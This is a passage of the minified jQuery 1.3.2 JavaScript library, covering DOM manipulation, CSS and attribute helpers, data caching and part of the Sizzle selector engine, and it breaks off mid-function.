(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document;F.selector=E;return F}}else{return o(H).find(E)}}else{if(o.isFunction(E)){return o(document).ready(E)}}if(E.selector&&E.context){this.selector=E.selector;this.context=E.context}return this.setArray(o.isArray(E)?E:o.makeArray(E))},selector:"",jquery:"1.3.2",size:function(){return this.length},get:function(E){return E===g?Array.prototype.slice.call(this):this[E]},pushStack:function(F,H,E){var G=o(F);G.prevObject=this;G.context=this.context;if(H==="find"){G.selector=this.selector+(this.selector?" ":"")+E}else{if(H){G.selector=this.selector+"."+H+"("+E+")"}}return G},setArray:function(E){this.length=0;Array.prototype.push.apply(this,E);return this},each:function(F,E){return o.each(this,F,E)},index:function(E){return o.inArray(E&&E.jquery?E[0]:E,this)},attr:function(F,H,G){var E=F;if(typeof F==="string"){if(H===g){return this[0]&&o[G||"attr"](this[0],F)}else{E={};E[F]=H}}return this.each(function(I){for(F in E){o.attr(G?this.style:this,F,o.prop(this,E[F],G,I,F))}})},css:function(E,F){if((E=="width"||E=="height")&&parseFloat(F)<0){F=g}return this.attr(E,F,"curCSS")},text:function(F){if(typeof F!=="object"&&F!=null){return this.empty().append((this[0]&&this[0].ownerDocument||document).createTextNode(F))}var E="";o.each(F||this,function(){o.each(this.childNodes,function(){if(this.nodeType!=8){E+=this.nodeType!=1?this.nodeValue:o.fn.text([this])}})});return E},wrapAll:function(E){if(this[0]){var F=o(E,this[0].ownerDocument).clone();if(this[0].parentNode){F.insertBefore(this[0])}F.map(function(){var G=this;while(G.firstChild){G=G.firstChild}return G}).append(this)}return this},wrapInner:function(E){return this.each(function(){o(this).contents().wrapAll(E)})},wrap:function(E){return this.each(function(){o(this).wrapAll(E)})},append:function(){return this.domManip(arguments,true,function(E){if(this.nodeType==1){this.appendChild(E)}})},prepend:function(){return this.domManip(arguments,true,function(E){if(this.nodeType==1){this.insertBefore(E,this.firstChild)}})},before:function(){return this.domManip(arguments,false,function(E){this.parentNode.insertBefore(E,this)})},after:function(){return this.domManip(arguments,false,function(E){this.parentNode.insertBefore(E,this.nextSibling)})},end:function(){return this.prevObject||o([])},push:[].push,sort:[].sort,splice:[].splice,find:function(E){if(this.length===1){var F=this.pushStack([],"find",E);F.length=0;o.find(E,this[0],F);return F}else{return this.pushStack(o.unique(o.map(this,function(G){return o.find(E,G)})),"find",E)}},clone:function(G){var E=this.map(function(){if(!o.support.noCloneEvent&&!o.isXMLDoc(this)){var I=this.outerHTML;if(!I){var J=this.ownerDocument.createElement("div");J.appendChild(this.cloneNode(true));I=J.innerHTML}return o.clean([I.replace(/ jQuery\d+="(?:\d+|null)"/g,"").replace(/^\s*/,"")])[0]}else{return this.cloneNode(true)}});if(G===true){var H=this.find("*").andSelf(),F=0;E.find("*").andSelf().each(function(){if(this.nodeName!==H[F].nodeName){return}var I=o.data(H[F],"events");for(var K in I){for(var J in I[K]){o.event.add(this,K,I[K][J],I[K][J].data)}}F++})}return E},filter:function(E){return this.pushStack(o.isFunction(E)&&o.grep(this,function(G,F){return E.call(G,F)})||o.multiFilter(E,o.grep(this,function(F){return F.nodeType===1})),"filter",E)},closest:function(E){var G=o.expr.match.POS.test(E)?o(E):null,F=0;return this.map(function(){var H=this;while(H&&H.ownerDocument){if(G?G.index(H)>-1:o(H).is(E)){o.data(H,"closest",F);return H}H=H.parentNode;F++}})},not:function(E){if(typeof E==="string"){if(f.test(E)){return this.pushStack(o.multiFilter(E,this,true),"not",E)}else{E=o.multiFilter(E,this)}}var F=E.length&&E[E.length-1]!==g&&!E.nodeType;return this.filter(function(){return F?o.inArray(this,E)<0:this!=E})},add:function(E){return this.pushStack(o.unique(o.merge(this.get(),typeof E==="string"?o(E):o.makeArray(E))))},is:function(E){return!!E&&o.multiFilter(E,this).length>0},hasClass:function(E){return!!E&&this.is("."+E)},val:function(K){if(K===g){var E=this[0];if(E){if(o.nodeName(E,"option")){return(E.attributes.value||{}).specified?E.value:E.text}if(o.nodeName(E,"select")){var I=E.selectedIndex,L=[],M=E.options,H=E.type=="select-one";if(I<0){return null}for(var F=H?I:0,J=H?I+1:M.length;F<J;F++){var G=M[F];if(G.selected){K=o(G).val();if(H){return K}L.push(K)}}return L}return(E.value||"").replace(/\r/g,"")}return g}if(typeof K==="number"){K+=""}return this.each(function(){if(this.nodeType!=1){return}if(o.isArray(K)&&/radio|checkbox/.test(this.type)){this.checked=(o.inArray(this.value,K)>=0||o.inArray(this.name,K)>=0)}else{if(o.nodeName(this,"select")){var N=o.makeArray(K);o("option",this).each(function(){this.selected=(o.inArray(this.value,N)>=0||o.inArray(this.text,N)>=0)});if(!N.length){this.selectedIndex=-1}}else{this.value=K}}})},html:function(E){return E===g?(this[0]?this[0].innerHTML.replace(/ jQuery\d+="(?:\d+|null)"/g,""):null):this.empty().append(E)},replaceWith:function(E){return this.after(E).remove()},eq:function(E){return this.slice(E,+E+1)},slice:function(){return this.pushStack(Array.prototype.slice.apply(this,arguments),"slice",Array.prototype.slice.call(arguments).join(","))},map:function(E){return this.pushStack(o.map(this,function(G,F){return E.call(G,F,G)}))},andSelf:function(){return this.add(this.prevObject)},domManip:function(J,M,L){if(this[0]){var I=(this[0].ownerDocument||this[0]).createDocumentFragment(),F=o.clean(J,(this[0].ownerDocument||this[0]),I),H=I.firstChild;if(H){for(var G=0,E=this.length;G<E;G++){L.call(K(this[G],H),this.length>1||G>0?I.cloneNode(true):I)}}if(F){o.each(F,z)}}return this;function K(N,O){return M&&o.nodeName(N,"table")&&o.nodeName(O,"tr")?(N.getElementsByTagName("tbody")[0]||N.appendChild(N.ownerDocument.createElement("tbody"))):N}}};o.fn.init.prototype=o.fn;function z(E,F){if(F.src){o.ajax({url:F.src,async:false,dataType:"script"})}else{o.globalEval(F.text||F.textContent||F.innerHTML||"")}if(F.parentNode){F.parentNode.removeChild(F)}}function e(){return+new Date}o.extend=o.fn.extend=function(){var J=arguments[0]||{},H=1,I=arguments.length,E=false,G;if(typeof J==="boolean"){E=J;J=arguments[1]||{};H=2}if(typeof J!=="object"&&!o.isFunction(J)){J={}}if(I==H){J=this;--H}for(;H<I;H++){if((G=arguments[H])!=null){for(var F in G){var K=J[F],L=G[F];if(J===L){continue}if(E&&L&&typeof L==="object"&&!L.nodeType){J[F]=o.extend(E,K||(L.length!=null?[]:{}),L)}else{if(L!==g){J[F]=L}}}}}return J};var b=/z-?index|font-?weight|opacity|zoom|line-?height/i,q=document.defaultView||{},s=Object.prototype.toString;o.extend({noConflict:function(E){l.$=p;if(E){l.jQuery=y}return o},isFunction:function(E){return s.call(E)==="[object Function]"},isArray:function(E){return s.call(E)==="[object Array]"},isXMLDoc:function(E){return E.nodeType===9&&E.documentElement.nodeName!=="HTML"||!!E.ownerDocument&&o.isXMLDoc(E.ownerDocument)},globalEval:function(G){if(G&&/\S/.test(G)){var F=document.getElementsByTagName("head")[0]||document.documentElement,E=document.createElement("script");E.type="text/javascript";if(o.support.scriptEval){E.appendChild(document.createTextNode(G))}else{E.text=G}F.insertBefore(E,F.firstChild);F.removeChild(E)}},nodeName:function(F,E){return F.nodeName&&F.nodeName.toUpperCase()==E.toUpperCase()},each:function(G,K,F){var E,H=0,I=G.length;if(F){if(I===g){for(E in G){if(K.apply(G[E],F)===false){break}}}else{for(;H<I;){if(K.apply(G[H++],F)===false){break}}}}else{if(I===g){for(E in G){if(K.call(G[E],E,G[E])===false){break}}}else{for(var J=G[0];H<I&&K.call(J,H,J)!==false;J=G[++H]){}}}return G},prop:function(H,I,G,F,E){if(o.isFunction(I)){I=I.call(H,F)}return typeof I==="number"&&G=="curCSS"&&!b.test(E)?I+"px":I},className:{add:function(E,F){o.each((F||"").split(/\s+/),function(G,H){if(E.nodeType==1&&!o.className.has(E.className,H)){E.className+=(E.className?" ":"")+H}})},remove:function(E,F){if(E.nodeType==1){E.className=F!==g?o.grep(E.className.split(/\s+/),function(G){return!o.className.has(F,G)}).join(" "):""}},has:function(F,E){return F&&o.inArray(E,(F.className||F).toString().split(/\s+/))>-1}},swap:function(H,G,I){var E={};for(var F in G){E[F]=H.style[F];H.style[F]=G[F]}I.call(H);for(var F in G){H.style[F]=E[F]}},css:function(H,F,J,E){if(F=="width"||F=="height"){var L,G={position:"absolute",visibility:"hidden",display:"block"},K=F=="width"?["Left","Right"]:["Top","Bottom"];function I(){L=F=="width"?H.offsetWidth:H.offsetHeight;if(E==="border"){return}o.each(K,function(){if(!E){L-=parseFloat(o.curCSS(H,"padding"+this,true))||0}if(E==="margin"){L+=parseFloat(o.curCSS(H,"margin"+this,true))||0}else{L-=parseFloat(o.curCSS(H,"border"+this+"Width",true))||0}})}if(H.offsetWidth!==0){I()}else{o.swap(H,G,I)}return Math.max(0,Math.round(L))}return o.curCSS(H,F,J)},curCSS:function(I,F,G){var L,E=I.style;if(F=="opacity"&&!o.support.opacity){L=o.attr(E,"opacity");return L==""?"1":L}if(F.match(/float/i)){F=w}if(!G&&E&&E[F]){L=E[F]}else{if(q.getComputedStyle){if(F.match(/float/i)){F="float"}F=F.replace(/([A-Z])/g,"-$1").toLowerCase();var M=q.getComputedStyle(I,null);if(M){L=M.getPropertyValue(F)}if(F=="opacity"&&L==""){L="1"}}else{if(I.currentStyle){var J=F.replace(/\-(\w)/g,function(N,O){return O.toUpperCase()});L=I.currentStyle[F]||I.currentStyle[J];if(!/^\d+(px)?$/i.test(L)&&/^\d/.test(L)){var H=E.left,K=I.runtimeStyle.left;I.runtimeStyle.left=I.currentStyle.left;E.left=L||0;L=E.pixelLeft+"px";E.left=H;I.runtimeStyle.left=K}}}}return L},clean:function(F,K,I){K=K||document;if(typeof K.createElement==="undefined"){K=K.ownerDocument||K[0]&&K[0].ownerDocument||document}if(!I&&F.length===1&&typeof F[0]==="string"){var H=/^<(\w+)\s*\/?>$/.exec(F[0]);if(H){return[K.createElement(H[1])]}}var G=[],E=[],L=K.createElement("div");o.each(F,function(P,S){if(typeof S==="number"){S+=""}if(!S){return}if(typeof S==="string"){S=S.replace(/(<(\w+)[^>]*?)\/>/g,function(U,V,T){return T.match(/^(abbr|br|col|img|input|link|meta|param|hr|area|embed)$/i)?U:V+"></"+T+">"});var O=S.replace(/^\s+/,"").substring(0,10).toLowerCase();var Q=!O.indexOf("<opt")&&[1,"<select multiple='multiple'>","</select>"]||!O.indexOf("<leg")&&[1,"<fieldset>","</fieldset>"]||O.match(/^<(thead|tbody|tfoot|colg|cap)/)&&[1,"<table>","</table>"]||!O.indexOf("<tr")&&[2,"<table><tbody>","</tbody></table>"]||(!O.indexOf("<td")||!O.indexOf("<th"))&&[3,"<table><tbody><tr>","</tr></tbody></table>"]||!O.indexOf("<col")&&[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"]||!o.support.htmlSerialize&&[1,"div<div>","</div>"]||[0,"",""];L.innerHTML=Q[1]+S+Q[2];while(Q[0]--){L=L.lastChild}if(!o.support.tbody){var R=/<tbody/i.test(S),N=!O.indexOf("<table")&&!R?L.firstChild&&L.firstChild.childNodes:Q[1]=="<table>"&&!R?L.childNodes:[];for(var M=N.length-1;M>=0;--M){if(o.nodeName(N[M],"tbody")&&!N[M].childNodes.length){N[M].parentNode.removeChild(N[M])}}}if(!o.support.leadingWhitespace&&/^\s/.test(S)){L.insertBefore(K.createTextNode(S.match(/^\s*/)[0]),L.firstChild)}S=o.makeArray(L.childNodes)}if(S.nodeType){G.push(S)}else{G=o.merge(G,S)}});if(I){for(var J=0;G[J];J++){if(o.nodeName(G[J],"script")&&(!G[J].type||G[J].type.toLowerCase()==="text/javascript")){E.push(G[J].parentNode?G[J].parentNode.removeChild(G[J]):G[J])}else{if(G[J].nodeType===1){G.splice.apply(G,[J+1,0].concat(o.makeArray(G[J].getElementsByTagName("script"))))}I.appendChild(G[J])}}return E}return G},attr:function(J,G,K){if(!J||J.nodeType==3||J.nodeType==8){return g}var H=!o.isXMLDoc(J),L=K!==g;G=H&&o.props[G]||G;if(J.tagName){var F=/href|src|style/.test(G);if(G=="selected"&&J.parentNode){J.parentNode.selectedIndex}if(G in J&&H&&!F){if(L){if(G=="type"&&o.nodeName(J,"input")&&J.parentNode){throw"type property can't be changed"}J[G]=K}if(o.nodeName(J,"form")&&J.getAttributeNode(G)){return J.getAttributeNode(G).nodeValue}if(G=="tabIndex"){var I=J.getAttributeNode("tabIndex");return I&&I.specified?I.value:J.nodeName.match(/(button|input|object|select|textarea)/i)?0:J.nodeName.match(/^(a|area)$/i)&&J.href?0:g}return J[G]}if(!o.support.style&&H&&G=="style"){return o.attr(J.style,"cssText",K)}if(L){J.setAttribute(G,""+K)}var E=!o.support.hrefNormalized&&H&&F?J.getAttribute(G,2):J.getAttribute(G);return E===null?g:E}if(!o.support.opacity&&G=="opacity"){if(L){J.zoom=1;J.filter=(J.filter||"").replace(/alpha\([^)]*\)/,"")+(parseInt(K)+""=="NaN"?"":"alpha(opacity="+K*100+")")}return J.filter&&J.filter.indexOf("opacity=")>=0?(parseFloat(J.filter.match(/opacity=([^)]*)/)[1])/100)+"":""}G=G.replace(/-([a-z])/ig,function(M,N){return N.toUpperCase()});if(L){J[G]=K}return J[G]},trim:function(E){return(E||"").replace(/^\s+|\s+$/g,"")},makeArray:function(G){var E=[];if(G!=null){var F=G.length;if(F==null||typeof G==="string"||o.isFunction(G)||G.setInterval){E[0]=G}else{while(F){E[--F]=G[F]}}}return E},inArray:function(G,H){for(var E=0,F=H.length;E<F;E++){if(H[E]===G){return E}}return-1},merge:function(H,E){var F=0,G,I=H.length;if(!o.support.getAll){while((G=E[F++])!=null){if(G.nodeType!=8){H[I++]=G}}}else{while((G=E[F++])!=null){H[I++]=G}}return H},unique:function(K){var F=[],E={};try{for(var G=0,H=K.length;G<H;G++){var J=o.data(K[G]);if(!E[J]){E[J]=true;F.push(K[G])}}}catch(I){F=K}return F},grep:function(F,J,E){var G=[];for(var H=0,I=F.length;H<I;H++){if(!E!=!J(F[H],H)){G.push(F[H])}}return G},map:function(E,J){var F=[];for(var G=0,H=E.length;G<H;G++){var I=J(E[G],G);if(I!=null){F[F.length]=I}}return F.concat.apply([],F)}});var C=navigator.userAgent.toLowerCase();o.browser={version:(C.match(/.+(?:rv|it|ra|ie)[\/: ]([\d.]+)/)||[0,"0"])[1],safari:/webkit/.test(C),opera:/opera/.test(C),msie:/msie/.test(C)&&!/opera/.test(C),mozilla:/mozilla/.test(C)&&!/(compatible|webkit)/.test(C)};o.each({parent:function(E){return E.parentNode},parents:function(E){return o.dir(E,"parentNode")},next:function(E){return o.nth(E,2,"nextSibling")},prev:function(E){return o.nth(E,2,"previousSibling")},nextAll:function(E){return o.dir(E,"nextSibling")},prevAll:function(E){return o.dir(E,"previousSibling")},siblings:function(E){return o.sibling(E.parentNode.firstChild,E)},children:function(E){return o.sibling(E.firstChild)},contents:function(E){return o.nodeName(E,"iframe")?E.contentDocument||E.contentWindow.document:o.makeArray(E.childNodes)}},function(E,F){o.fn[E]=function(G){var H=o.map(this,F);if(G&&typeof G=="string"){H=o.multiFilter(G,H)}return this.pushStack(o.unique(H),E,G)}});o.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(E,F){o.fn[E]=function(G){var J=[],L=o(G);for(var K=0,H=L.length;K<H;K++){var I=(K>0?this.clone(true):this).get();o.fn[F].apply(o(L[K]),I);J=J.concat(I)}return this.pushStack(J,E,G)}});o.each({removeAttr:function(E){o.attr(this,E,"");if(this.nodeType==1){this.removeAttribute(E)}},addClass:function(E){o.className.add(this,E)},removeClass:function(E){o.className.remove(this,E)},toggleClass:function(F,E){if(typeof E!=="boolean"){E=!o.className.has(this,F)}o.className[E?"add":"remove"](this,F)},remove:function(E){if(!E||o.filter(E,[this]).length){o("*",this).add([this]).each(function(){o.event.remove(this);o.removeData(this)});if(this.parentNode){this.parentNode.removeChild(this)}}},empty:function(){o(this).children().remove();while(this.firstChild){this.removeChild(this.firstChild)}}},function(E,F){o.fn[E]=function(){return this.each(F,arguments)}});function j(E,F){return E[0]&&parseInt(o.curCSS(E[0],F,true),10)||0}var h="jQuery"+e(),v=0,A={};o.extend({cache:{},data:function(F,E,G){F=F==l?A:F;var H=F[h];if(!H){H=F[h]=++v}if(E&&!o.cache[H]){o.cache[H]={}}if(G!==g){o.cache[H][E]=G}return E?o.cache[H][E]:H},removeData:function(F,E){F=F==l?A:F;var H=F[h];if(E){if(o.cache[H]){delete o.cache[H][E];E="";for(E in o.cache[H]){break}if(!E){o.removeData(F)}}}else{try{delete F[h]}catch(G){if(F.removeAttribute){F.removeAttribute(h)}}delete o.cache[H]}},queue:function(F,E,H){if(F){E=(E||"fx")+"queue";var G=o.data(F,E);if(!G||o.isArray(H)){G=o.data(F,E,o.makeArray(H))}else{if(H){G.push(H)}}}return G},dequeue:function(H,G){var E=o.queue(H,G),F=E.shift();if(!G||G==="fx"){F=E[0]}if(F!==g){F.call(H)}}});o.fn.extend({data:function(E,G){var H=E.split(".");H[1]=H[1]?"."+H[1]:"";if(G===g){var F=this.triggerHandler("getData"+H[1]+"!",[H[0]]);if(F===g&&this.length){F=o.data(this[0],E)}return F===g&&H[1]?this.data(H[0]):F}else{return this.trigger("setData"+H[1]+"!",[H[0],G]).each(function(){o.data(this,E,G)})}},removeData:function(E){return this.each(function(){o.removeData(this,E)})},queue:function(E,F){if(typeof E!=="string"){F=E;E="fx"}if(F===g){return o.queue(this[0],E)}return this.each(function(){var G=o.queue(this,E,F);if(E=="fx"&&G.length==1){G[0].call(this)}})},dequeue:function(E){return this.each(function(){o.dequeue(this,E)})}});(function(){var R=/((?:\((?:\([^()]+\)|[^()]+)+\)|\[(?:\[[^[\]]*\]|['"][^'"]*['"]|[^[\]'"]+)+\]|\\.|[^ >+~,(\[\\]+)+|[>+~])(\s*,\s*)?/g,L=0,H=Object.prototype.toString;var F=function(Y,U,ab,ac){ab=ab||[];U=U||document;if(U.nodeType!==1&&U.nodeType!==9){return[]}if(!Y||typeof Y!=="string"){return ab}var Z=[],W,af,ai,T,ad,V,X=true;R.lastIndex=0;while((W=R.exec(Y))!==null){Z.push(W[1]);if(W[2]){V=RegExp.rightContext;break}}if(Z.length>1&&M.exec(Y)){if(Z.length===2&&I.relative[Z[0]]){af=J(Z[0]+Z[1],U)}else{af=I.relative[Z[0]]?[U]:F(Z.shift(),U);while(Z.length){Y=Z.shift();if(I.relative[Y]){Y+=Z.shift()}af=J(Y,af)}}}else{var ae=ac?{expr:Z.pop(),set:E(ac)}:F.find(Z.pop(),Z.length===1&&U.parentNode?U.parentNode:U,Q(U));af=F.filter(ae.expr,ae.set);if(Z.length>0){ai=E(af)}else{X=false}while(Z.length){var ah=Z.pop(),ag=ah;if(!I.relative[ah]){ah=""}else{ag=Z.pop()}if(ag==null){ag=U}I.relative[ah](ai,ag,Q(U))}}if(!ai){ai=af}if(!ai){throw"Syntax error, unrecognized expression: "+(ah||Y)}if(H.call(ai)==="[object Array]"){if(!X){ab.push.apply(ab,ai)}else{if(U.nodeType===1){for(var aa=0;ai[aa]!=null;aa++){if(ai[aa]&&(ai[aa]===true||ai[aa].nodeType===1&&K(U,ai[aa]))){ab.push(af[aa])}}}else{for(var aa=0;ai[aa]!=null;aa++){if(ai[aa]&&ai[aa].nodeType===1){ab.push(af[aa])}}}}}else{E(ai,ab)}if(V){F(V,U,ab,ac);if(G){hasDuplicate=false;ab.sort(G);if(hasDuplicate){for(var aa=1;aa<ab.length;aa++){if(ab[aa]===ab[aa-1]){ab.splice(aa--,1)}}}}}return ab};F.matches=function(T,U){return F(T,null,null,U)};F.find=function(aa,T,ab){var Z,X;if(!aa){return[]}for(var W=0,V=I.order.length;W<V;W++){var Y=I.order[W],X;if((X=I.match[Y].exec(aa))){var U=RegExp.leftContext;if(U.substr(U.length-1)!=="\\"){X[1]=(X[1]||"").replace(/\\/g,"");Z=I.find[Y](X,T,ab);if(Z!=null){aa=aa.replace(I.match[Y],"");break}}}}if(!Z){Z=T.getElementsByTagName("*")}return{set:Z,expr:aa}};F.filter=function(ad,ac,ag,W){var V=ad,ai=[],aa=ac,Y,T,Z=ac&&ac[0]&&Q(ac[0]);while(ad&&ac.length){for(var ab in I.filter){if((Y=I.match[ab].exec(ad))!=null){var U=I.filter[ab],ah,af;T=false;if(aa==ai){ai=[]}if(I.preFilter[ab]){Y=I.preFilter[ab](Y,aa,ag,ai,W,Z);if(!Y){T=ah=true}else{if(Y===true){continue}}}if(Y){for(var X=0;(af=aa[X])!=null;X++){if(af){ah=U(af,Y,X,aa);var ae=W^!!ah;if(ag&&ah!=null){if(ae){T=true}else{aa[X]=false}}else{if(ae){ai.push(af);T=true}}}}}if(ah!==g){if(!ag){aa=ai}ad=ad.replace(I.match[ab],"");if(!T){return[]}break}}}if(ad==V){if(T==null){throw"Syntax error, unrecognized expression: "+ad}else{break}}V=ad}return aa};var I=F.selectors={order:["ID","NAME","TAG"],match:{ID:/#((?:[\w\u00c0-\uFFFF_-]|\\.)+)/,CLASS:/\.((?:[\w\u00c0-\uFFFF_-]|\\.)+)/,NAME:/\[name=['"]*((?:[\w\u00c0-\uFFFF_-]|\\.)+)['"]*\]/,ATTR:/\[\s*((?:[\w\u00c0-\uFFFF_-]|\\.)+)\s*(?:(\S?=)\s*(['"]*)(.*?)\3|)\s*\]/,TAG:/^((?:[\w\u00c0-\uFFFF\*_-]|\\.)+)/,CHILD:/:(only|nth|last|first)-child(?:\((even|odd|[\dn+-]*)\))?/,POS:/:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^-]|$)/,PSEUDO:/:((?:[\w\u00c0-\uFFFF_-]|\\.)+)(?:\((['"]*)((?:\([^\)]+\)|[^\2\(\)]*)+)\2\))?/},attrMap:{"class":"className","for":"htmlFor"},attrHandle:{href:function(T){return T.getAttribute("href")}},relative:{"+":function(aa,T,Z){var X=typeof T==="string",ab=X&&!/\W/.test(T),Y=X&&!ab;if(ab&&!Z){T=T.toUpperCase()}for(var W=0,V=aa.length,U;W<V;W++){if((U=aa[W])){while((U=U.previousSibling)&&U.nodeType!==1){}aa[W]=Y||U&&U.nodeName===T?U||false:U===T}}if(Y){F.filter(T,aa,true)}},">":function(Z,U,aa){var X=typeof U==="string";if(X&&!/\W/.test(U)){U=aa?U:U.toUpperCase();for(var V=0,T=Z.length;V<T;V++){var Y=Z[V];if(Y){var W=Y.parentNode;Z[V]=W.nodeName===U?W:false}}}else{for(var V=0,T=Z.length;V<T;V++){var Y=Z[V];if(Y){Z[V]=X?Y.parentNode:Y.parentNode===U}}if(X){F.filter(U,Z,true)}}},"":function(W,U,Y){var V=L++,T=S;if(!U.match(/\W/)){var X=U=Y?U:U.toUpperCase();T=P}T("parentNode",U,V,W,X,Y)},"~":function(W,U,Y){var V=L++,T=S;if(typeof U==="string"&&!U.match(/\W/)){var X=U=Y?U:U.toUpperCase();T=P}T("previousSibling",U,V,W,X,Y)}},find:{ID:function(U,V,W){if(typeof V.getElementById!=="undefined"&&!W){var T=V.getElementById(U[1]);return T?[T]:[]}},NAME:function(V,Y,Z){if(typeof Y.getElementsByName!=="undefined"){var U=[],X=Y.getElementsByName(V[1]);for(var W=0,T=X.length;W<T;W++){if(X[W].getAttribute("name")===V[1]){U.push(X[W])}}return U.length===0?null:U}},TAG:function(T,U){return U.getElementsByTagName(T[1])}},preFilter:{CLASS:function(W,U,V,T,Z,aa){W=" "+W[1].replace(/\\/g,"")+" ";if(aa){return W}for(var X=0,Y;(Y=U[X])!=null;X++){if(Y){if(Z^(Y.className&&(" "+Y.className+" ").indexOf(W)>=0)){if(!V){T.push(Y)}}else{if(V){U[X]=false}}}}return false},ID:function(T){return T[1].replace(/\\/g,"")},TAG:function(U,T){for(var V=0;T[V]===false;V++){}return T[V]&&Q(T[V])?U[1]:U[1].toUpperCase()},CHILD:function(T){if(T[1]=="nth"){var U=/(-?)(\d*)n((?:\+|-)?\d*)/.exec(T[2]=="even"&&"2n"||T[2]=="odd"&&"2n+1"||!/\D/.test(T[2])&&"0n+"+T[2]||T[2]);T[2]=(U[1]+(U[2]||1))-0;T[3]=U[3]-0}T[0]=L++;return T},ATTR:function(X,U,V,T,Y,Z){var W=X[1].replace(/\\/g,"");if(!Z&&I.attrMap[W]){X[1]=I.attrMap[W]}if(X[2]==="~="){X[4]=" "+X[4]+" "}return X},PSEUDO:function(X,U,V,T,Y){if(X[1]==="not"){if(X[3].match(R).length>1||/^\w/.test(X[3])){X[3]=F(X[3],null,null,U)}else{var W=F.filter(X[3],U,V,true^Y);if(!V){T.push.apply(T,W)}return false}}else{if(I.match.POS.test(X[0])||I.match.CHILD.test(X[0])){return true}}return X},POS:function(T){T.unshift(true);return T}},filters:{enabled:function(T){return T.disabled===false&&T.type!=="hidden"},disabled:function(T){return T.disabled===true},checked:function(T){return T.checked===true},selected:function(T){T.parentNode.selectedIndex;return T.selected===true},parent:function(T){return!!T.firstChild},empty:function(T){return!T.firstChild},has:function(V,U,T){return!!F(T[3],V).length},header:function(T){return/h\d/i.test(T.nodeName)},text:function(T){return"text"===T.type},radio:function(T){return"radio"===T.type},checkbox:function(T){return"checkbox"===T.type},file:function(T){return"file"===T.type},password:function(T){return"password"===T.type},submit:function(T){return"submit"===T.type},image:function(T){return"image"===T.type},reset:function(T){return"reset"===T.type},button:function(T){return"button"===T.type||T.nodeName.toUpperCase()==="BUTTON"},input:function(T){return/input|select|textarea|button/i.test(T.nodeName)}},setFilters:{first:function(U,T){return T===0},last:function(V,U,T,W){return U===W.length-1},even:function(U,T){return T%2===0},odd:function(U,T){return T%2===1},lt:function(V,U,T){return U<T[3]-0},gt:function(V,U,T){return U>T[3]-0},nth:function(V,U,T){return T[3]-0==U},eq:function(V,U,T){return T[3]-0==U}},filter:{PSEUDO:function(Z,V,W,aa){var U=V[1],X=I.filters[U];if(X){return X(Z,W,V,aa)}else{if(U==="contains"){return(Z.textContent||Z.innerText||"").indexOf(V[3])>=0}else{if(U==="not"){var Y=V[3];for(var W=0,T=Y.length;W<T;W++){if(Y[W]===Z){return false}}return true}}}},CHILD:function(T,W){var Z=W[1],U=T;switch(Z){case"only":case"first":while(U=U.previousSibling){if(U.nodeType===1){return false}}if(Z=="first"){return true}U=T;case"last":while(U=U.nextSibling){if(U.nodeType===1){return false}}return true;case"nth":var V=W[2],ac=W[3];if(V==1&&ac==0){return true}var Y=W[0],ab=T.parentNode;if(ab&&(ab.sizcache!==Y||!T.nodeIndex)){var X=0;for(U=ab.firstChild;U;U=U.nextSibling){if(U.nodeType===1){U.nodeIndex=++X}}ab.sizcache=Y}var aa=T.nodeIndex-ac;if(V==0){return aa==0}else{return(aa%V==0&&aa/V>=0)}}},ID:function(U,T){return U.nodeType===1&&U.getAttribute("id")===T},TAG:function(U,T){return(T==="*"&&U.nodeType===1)||U.nodeName===T},CLASS:function(U,T){return(" "+(U.className||U.getAttribute("class"))+" ").indexOf(T)>-1},ATTR:function(Y,W){var V=W[1],T=I.attrHandle[V]?I.attrHandle[V](Y):Y[V]!=null?Y[V]:Y.getAttribute(V),Z=T+"",X=W[2],U=W[4];return T==null?X==="!=":X==="="?Z===U:X==="*="?Z.indexOf(U)>=0:X==="~="?(" "+Z+" ").indexOf(U)>=0:!U?Z&&T!==false:X==="!="?Z!=U:X==="^="?Z.indexOf(U)===0:X==="$="?Z.substr(Z.length-U.length)===U:X==="|="?Z===U||Z.substr(0,U.length+1)===U+"-":false},POS:function(X,U,V,Y){var T=U[2],W=I.setFilters[T];if(W){return W(X,V,U,Y)}}}};var M=I.match.POS;for(var O in I.match){I.match[O]=RegExp(I.match[O].source+/(?![^\[]*\])(?![^\(]*\))/.source)}var E=function(U,T){U=Array.prototype.slice.call(U);if(T){T.push.apply(T,U);return T}return U};try{Array.prototype.slice.call(document.documentElement.childNodes)}catch(N){E=function(X,W){var U=W||[];if(H.call(X)==="[object Array]"){Array.prototype.push.apply(U,X)}else{if(typeof X.length==="number"){for(var V=0,T=X.length;V<T;V++){U.push(X[V])}}else{for(var V=0;X[V];V++){U.push(X[V])}}}return U}}var G;if(document.documentElement.compareDocumentPosition){G=function(U,T){var V=U.compareDocumentPosition(T)&4?-1:U===T?0:1;if(V===0){hasDuplicate=true}return V}}else{if("sourceIndex"in document.documentElement){G=function(U,T){var V=U.sourceIndex-T.sourceIndex;if(V===0){hasDuplicate=true}return V}}else{if(document.createRange){G=function(W,U){var V=W.ownerDocument.createRange(),T=U.ownerDocument.createRange();V.selectNode(W);V.collapse(true);T.selectNode(U);T.collapse(true);var X=V.compareBoundaryPoints(Range.START_TO_END,T);if(X===0){hasDuplicate=true}return X}}}}(function(){var U=document.createElement("form"),V="script"+(new Date).getTime();U.innerHTML="<input name='"+V+"'/>";var T=document.documentElement;T.insertBefore(U,T.firstChild);if(!!document.getElementById(V)){I.find.ID=function(X,Y,Z){if(typeof Y.getElementById!=="undefined"&&!Z){var W=Y.getElementById(X[1]);return W?W.id===X[1]||typeof W.getAttributeNode!=="undefined"&&W.getAttributeNode("id").nodeValue===X[1]?[W]:g:[]}};I.filter.ID=function(Y,W){var X=typeof Y.getAttributeNode!=="undefined"&&Y.getAttributeNode("id");return Y.nodeType===1&&X&&X.nodeValue===W}}T.removeChild(U)})();(function(){var 